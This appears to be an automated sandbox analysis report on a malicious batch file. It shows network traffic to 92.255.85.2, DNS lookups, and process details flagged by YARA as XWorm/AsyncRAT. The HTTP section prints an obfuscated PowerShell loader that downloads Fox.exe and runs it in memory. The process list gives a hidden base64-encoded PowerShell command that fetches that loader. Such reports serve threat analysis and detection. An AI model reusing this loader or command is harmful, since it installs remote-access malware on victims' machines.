                                                  Mar 26, 2025 04:19:19.083127975 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:19.083287954 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:19.318501949 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:19.318763971 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:19.553390026 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:24.082658052 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:24.279149055 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:24.281095982 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:24.525702000 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:26.051265001 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:26.247567892 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:26.249495983 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:26.491524935 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:34.348220110 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:34.544073105 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:34.544143915 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:34.743055105 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:34.743145943 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:34.937644005 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:34.937959909 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:35.178081989 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:35.182497978 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:35.428144932 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:37.692370892 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:37.888014078 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:37.889842987 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:38.131548882 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:39.600373983 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:39.795628071 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:39.800307989 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:40.038769007 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:40.038835049 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:40.235872030 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:40.237881899 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:40.474895000 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:43.464364052 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:43.504565954 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:44.989270926 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:45.185013056 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:45.185312986 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:45.381021976 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:45.381283998 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:45.617682934 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:45.617887974 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:45.865178108 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:50.488847971 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:50.684968948 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:50.685055017 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:50.881515980 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:50.881599903 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:51.132805109 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:19:51.136492968 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:19:51.380846977 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:02.520126104 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:02.715302944 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:02.717006922 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:02.958842039 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:04.639583111 CET49679443192.168.2.448.209.164.47
                                                  Mar 26, 2025 04:20:13.465253115 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:13.556415081 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:13.772274971 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:13.967983007 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:13.972424030 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:14.212466002 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:14.864294052 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:15.060705900 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:15.062351942 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:15.302757025 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:18.818357944 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:19.015072107 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:19.016685963 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:19.256104946 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:25.435448885 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:25.631596088 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:25.634097099 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:25.881514072 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:27.395195007 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:27.590423107 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:27.592171907 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:27.834619045 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:31.703769922 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:31.899017096 CET43724972292.255.85.2192.168.2.4
                                                  Mar 26, 2025 04:20:31.900002003 CET497224372192.168.2.492.255.85.2
                                                  Mar 26, 2025 04:20:32.148452044 CET43724972292.255.85.2192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 26, 2025 04:16:36.425180912 CET5187953192.168.2.41.1.1.1
                                                  Mar 26, 2025 04:16:36.521946907 CET53518791.1.1.1192.168.2.4

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Mar 26, 2025 04:16:36.425180912 CET192.168.2.41.1.1.10x62a4Standard query (0)c.pki.googA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.19A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.23A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.27A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.21A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.31A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.29A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.25A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.221071959 CET1.1.1.1192.168.2.40x4c8fNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com208.89.73.17A (IP address)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.521946907 CET1.1.1.1192.168.2.40x62a4No error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                  Mar 26, 2025 04:16:36.521946907 CET1.1.1.1192.168.2.40x62a4No error (0)pki-goog.l.google.com142.250.80.35A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • 92.255.85.2
                                                  • c.pki.goog

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.44971792.255.85.2807872C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Mar 26, 2025 04:16:31.202980995 CET66OUTGET /a.mp4 HTTP/1.1
                                                  Host: 92.255.85.2
                                                  Connection: Keep-Alive
                                                  Mar 26, 2025 04:16:31.401839018 CET630INHTTP/1.1 200 OK
                                                  Content-Type: video/mp4
                                                  Last-Modified: Tue, 25 Mar 2025 21:44:00 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: "af92a5cf9ddb1:0"
                                                  Server: Microsoft-IIS/10.0
                                                  Date: Wed, 26 Mar 2025 03:16:31 GMT
                                                  Content-Length: 407
                                                  Data Raw: 24 64 67 75 65 74 42 57 71 30 4b 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 0d 0a 0d 0a 24 57 61 77 67 6c 43 4a 6d 65 4d 20 3d 20 22 73 76 50 73 32 68 73 76 50 73 32 74 73 76 50 73 32 74 73 76 50 73 32 70 73 76 50 73 32 3a 2f 2f 73 76 50 73 32 39 73 76 50 73 32 32 73 76 50 73 32 2e 73 76 50 73 32 32 73 76 50 73 32 35 73 76 50 73 32 35 73 76 50 73 32 2e 73 76 50 73 32 38 73 76 50 73 32 35 73 76 50 73 32 2e 73 76 50 73 32 32 73 76 50 73 32 2f 73 76 50 73 32 46 73 76 50 73 32 6f 73 76 50 73 32 78 73 76 50 73 32 2e 73 76 50 73 32 65 73 76 50 73 32 78 73 76 50 73 32 65 73 76 50 73 32 22 2e 52 65 70 6c 61 63 65 28 22 73 76 50 73 32 22 2c 20 22 22 29 0d 0a 0d 0a 24 52 39 75 33 61 74 20 3d 20 24 64 67 75 65 74 42 57 71 30 4b 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 24 57 61 77 67 6c 43 4a 6d 65 4d 29 0d 0a 0d 0a 24 56 43 66 52 54 5a 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 [TRUNCATED]
                                                  Data Ascii: $dguetBWq0K = New-Object System.Net.WebClient$WawglCJmeM = "svPs2hsvPs2tsvPs2tsvPs2psvPs2://svPs29svPs22svPs2.svPs22svPs25svPs25svPs2.svPs28svPs25svPs2.svPs22svPs2/svPs2FsvPs2osvPs2xsvPs2.svPs2esvPs2xsvPs2esvPs2".Replace("svPs2", "")$R9u3at = $dguetBWq0K.DownloadData($WawglCJmeM)$VCfRTZ = [System.Reflection.Assembly]::Load($R9u3at)$TWvCaa = $VCfRTZ.EntryPoint$TWvCaa.Invoke($null, @())
                                                  Mar 26, 2025 04:16:31.433971882 CET44OUTGET /Fox.exe HTTP/1.1
                                                  Host: 92.255.85.2
                                                  Mar 26, 2025 04:16:31.628999949 CET1254INHTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Last-Modified: Tue, 25 Mar 2025 21:42:34 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: "24cc0d1ce9ddb1:0"
                                                  Server: Microsoft-IIS/10.0
                                                  Date: Wed, 26 Mar 2025 03:16:31 GMT
                                                  Content-Length: 497568
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 95 fc ac ec 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ae 06 00 00 cc 00 00 00 00 00 00 8e cc 06 00 00 20 00 00 00 e0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 07 00 00 02 00 00 6a bc 07 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 cc 06 00 57 00 00 00 00 e0 06 00 9c c8 00 00 00 00 00 00 00 00 00 00 00 7c 07 00 a0 1b 00 00 00 c0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL"0 @ j`4W| H.text `.rsrc@@.relocz@BpH@]n*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-*(.*(/*(0*(1*(2*(3*(4*(5*(6*(7*(8*
                                                  Mar 26, 2025 04:16:31.629021883 CET1254INData Raw: 28 39 01 00 06 2a 1e 00 28 3a 01 00 06 2a 1e 00 28 3b 01 00 06 2a 1e 00 28 3c 01 00 06 2a 1e 00 28 3d 01 00 06 2a 1e 00 28 3e 01 00 06 2a 1e 00 28 3f 01 00 06 2a 1e 00 28 40 01 00 06 2a 1e 00 28 41 01 00 06 2a 1e 00 28 42 01 00 06 2a 1e 00 28 43
                                                  Data Ascii: (9*(:*(;*(<*(=*(>*(?*(@*(A*(B*(C*(D*(E*(F*(G*(H*(I*(J*(K*(L*(M*(N*(O*(P*(Q*(R*(S*(T*(U*(V*(W
                                                  Mar 26, 2025 04:16:31.629035950 CET1254INData Raw: 1e 00 28 d6 01 00 06 2a 1e 00 28 d7 01 00 06 2a 1e 00 28 d8 01 00 06 2a 1e 00 28 d9 01 00 06 2a 1e 00 28 da 01 00 06 2a 1e 00 28 db 01 00 06 2a 1e 00 28 dc 01 00 06 2a 1e 00 28 dd 01 00 06 2a 1e 00 28 de 01 00 06 2a 1e 00 28 df 01 00 06 2a 1e 00
                                                  Data Ascii: (*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:31.629049063 CET1254INData Raw: 06 2a 1e 00 28 73 02 00 06 2a 1e 00 28 74 02 00 06 2a 1e 00 28 75 02 00 06 2a 1e 00 28 76 02 00 06 2a 1e 00 28 77 02 00 06 2a 1e 00 28 78 02 00 06 2a 1e 00 28 79 02 00 06 2a 1e 00 28 7a 02 00 06 2a 1e 00 28 7b 02 00 06 2a 1e 00 28 7c 02 00 06 2a
                                                  Data Ascii: *(s*(t*(u*(v*(w*(x*(y*(z*({*(|*(}*(~*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*
                                                  Mar 26, 2025 04:16:31.629082918 CET1254INData Raw: 03 00 06 2a 1e 00 28 10 03 00 06 2a 1e 00 28 11 03 00 06 2a 1e 00 28 12 03 00 06 2a 1e 00 28 13 03 00 06 2a 1e 00 28 14 03 00 06 2a 1e 00 28 15 03 00 06 2a 1e 00 28 16 03 00 06 2a 1e 00 28 17 03 00 06 2a 1e 00 28 18 03 00 06 2a 1e 00 28 19 03 00
                                                  Data Ascii: *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-
                                                  Mar 26, 2025 04:16:31.629096031 CET1254INData Raw: 28 ac 03 00 06 2a 1e 00 28 ad 03 00 06 2a 1e 00 28 ae 03 00 06 2a 1e 00 28 af 03 00 06 2a 1e 00 28 b0 03 00 06 2a 1e 00 28 b1 03 00 06 2a 1e 00 28 b2 03 00 06 2a 1e 00 28 b3 03 00 06 2a 1e 00 28 b4 03 00 06 2a 1e 00 28 b5 03 00 06 2a 1e 00 28 b6
                                                  Data Ascii: (*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:31.629108906 CET1254INData Raw: 1e 00 28 49 04 00 06 2a 1e 00 28 4a 04 00 06 2a 1e 00 28 4b 04 00 06 2a 1e 00 28 4c 04 00 06 2a 1e 00 28 4d 04 00 06 2a 1e 00 28 4e 04 00 06 2a 1e 00 28 4f 04 00 06 2a 1e 00 28 50 04 00 06 2a 1e 00 28 51 04 00 06 2a 1e 00 28 52 04 00 06 2a 1e 00
                                                  Data Ascii: (I*(J*(K*(L*(M*(N*(O*(P*(Q*(R*(S*(T*(U*(V*(W*(X*(Y*(Z*([*(\*(]*(^*(_*(`*(a*(b*(c*(d*(e*(f*(
                                                  Mar 26, 2025 04:16:31.629122972 CET1254INData Raw: 06 2a 1e 00 28 e6 04 00 06 2a 1e 00 28 e7 04 00 06 2a 1e 00 28 e8 04 00 06 2a 1e 00 28 e9 04 00 06 2a 1e 00 28 ea 04 00 06 2a 1e 00 28 eb 04 00 06 2a 1e 00 28 ec 04 00 06 2a 1e 00 28 ed 04 00 06 2a 1e 00 28 ee 04 00 06 2a 1e 00 28 ef 04 00 06 2a
                                                  Data Ascii: *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*
                                                  Mar 26, 2025 04:16:31.629137039 CET1254INData Raw: 05 00 06 2a 1e 00 28 83 05 00 06 2a 1e 00 28 84 05 00 06 2a 1e 00 28 85 05 00 06 2a 1e 00 28 86 05 00 06 2a 1e 00 28 87 05 00 06 2a 1e 00 28 88 05 00 06 2a 1e 00 28 89 05 00 06 2a 1e 00 28 8a 05 00 06 2a 1e 00 28 8b 05 00 06 2a 1e 00 28 8c 05 00
                                                  Data Ascii: *(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:31.629151106 CET1254INData Raw: 28 1f 06 00 06 2a 1e 00 28 20 06 00 06 2a 1e 00 28 21 06 00 06 2a 1e 00 28 22 06 00 06 2a 1e 00 28 23 06 00 06 2a 1e 00 28 24 06 00 06 2a 1e 00 28 25 06 00 06 2a 1e 00 28 26 06 00 06 2a 1e 00 28 27 06 00 06 2a 1e 00 28 28 06 00 06 2a 1e 00 28 29
                                                  Data Ascii: (*( *(!*("*(#*($*(%*(&*('*((*()*(**(+*(,*(-*(.*(/*(0*(1*(2*(3*(4*(5*(6*(7*(8*(9*(:*(;*(<*(=
                                                  Mar 26, 2025 04:16:31.823343992 CET1254INData Raw: 1e 00 28 bc 06 00 06 2a 1e 00 28 bd 06 00 06 2a 1e 00 28 be 06 00 06 2a 1e 00 28 bf 06 00 06 2a 1e 00 28 c0 06 00 06 2a 1e 00 28 c1 06 00 06 2a 1e 00 28 c2 06 00 06 2a 1e 00 28 c3 06 00 06 2a 1e 00 28 c4 06 00 06 2a 1e 00 28 c5 06 00 06 2a 1e 00
                                                  Data Ascii: (*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(*(
                                                  Mar 26, 2025 04:16:32.726084948 CET42OUTGET /k.exe HTTP/1.1
                                                  Host: 92.255.85.2
                                                  Mar 26, 2025 04:16:32.920931101 CET1254INHTTP/1.1 200 OK
                                                  Content-Type: application/octet-stream
                                                  Last-Modified: Mon, 24 Mar 2025 16:34:54 GMT
                                                  Accept-Ranges: bytes
                                                  ETag: "6cef5acda9cdb1:0"
                                                  Server: Microsoft-IIS/10.0
                                                  Date: Wed, 26 Mar 2025 03:16:32 GMT
                                                  Content-Length: 33280
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ad 89 e1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 6e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 97 00 00 4f 00 00 00 00 a0 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgxn @ @O H.texttw x `.rsrcz@@.reloc@BPH,OG(*(*ssss*0~o+*0~o+*0~o+*0~o+*0((+*0(+*0(+*0(+*0-(++++*0*(*0 ~-(+~+*(*0Mr [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192.168.2.449720142.250.80.3580
                                                  TimestampBytes transferredDirectionData
                                                  Mar 26, 2025 04:16:36.623605013 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                  Cache-Control: max-age = 3000
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                  Host: c.pki.goog
                                                  Mar 26, 2025 04:16:36.713915110 CET222INHTTP/1.1 304 Not Modified
                                                  Date: Wed, 26 Mar 2025 03:03:27 GMT
                                                  Expires: Wed, 26 Mar 2025 03:53:27 GMT
                                                  Age: 789
                                                  Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                  Cache-Control: public, max-age=3000
                                                  Vary: Accept-Encoding
                                                  Mar 26, 2025 04:16:36.718883991 CET200OUTGET /r/r4.crl HTTP/1.1
                                                  Cache-Control: max-age = 3000
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                  User-Agent: Microsoft-CryptoAPI/10.0
                                                  Host: c.pki.goog
                                                  Mar 26, 2025 04:16:36.809873104 CET222INHTTP/1.1 304 Not Modified
                                                  Date: Wed, 26 Mar 2025 03:03:30 GMT
                                                  Expires: Wed, 26 Mar 2025 03:53:30 GMT
                                                  Age: 786
                                                  Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                  Cache-Control: public, max-age=3000
                                                  Vary: Accept-Encoding


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  050100150200s0.0020406080MB

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  • File
                                                  • Registry
                                                  • Network

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:1
                                                  Start time:23:16:23
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\92.255.85.2.bat" "
                                                  Imagebase:0x7ff67bb50000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
                                                  Show Windows behavior

                                                  File Activities

                                                  Show Windows behavior

                                                  Section Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Process Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Memory Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  General

                                                  Target ID:2
                                                  Start time:23:16:23
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff62fc20000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true
                                                  Show Windows behavior

                                                  File Activities

                                                  Show Windows behavior

                                                  Section Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Mutex Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Thread Activities

                                                  Show Windows behavior

                                                  Memory Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  Show Windows behavior

                                                  Windows UI Activities

                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  General

                                                  Target ID:3
                                                  Start time:23:16:24
                                                  Start date:25/03/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -e JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBJAEUAWAAgACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwA5ADIALgAyADUANQAuADgANQAuADIALwBhAC4AbQBwADQAJwApAA==
                                                  Imagebase:0x7ff7016f0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.1345688716.00000289197F9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.1345688716.0000028919871000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:high
                                                  Has exited:true
                                                  Show Windows behavior

                                                  File Activities

                                                  Show Windows behavior

                                                  Section Activities

                                                  Show Windows behavior

                                                  Registry Activities

                                                  Powershell Activities

                                                  Show Windows behavior

                                                  Mutex Activities

                                                  Show Windows behavior

                                                  Process Activities

                                                  Show Windows behavior

                                                  Thread Activities

                                                  Show Windows behavior

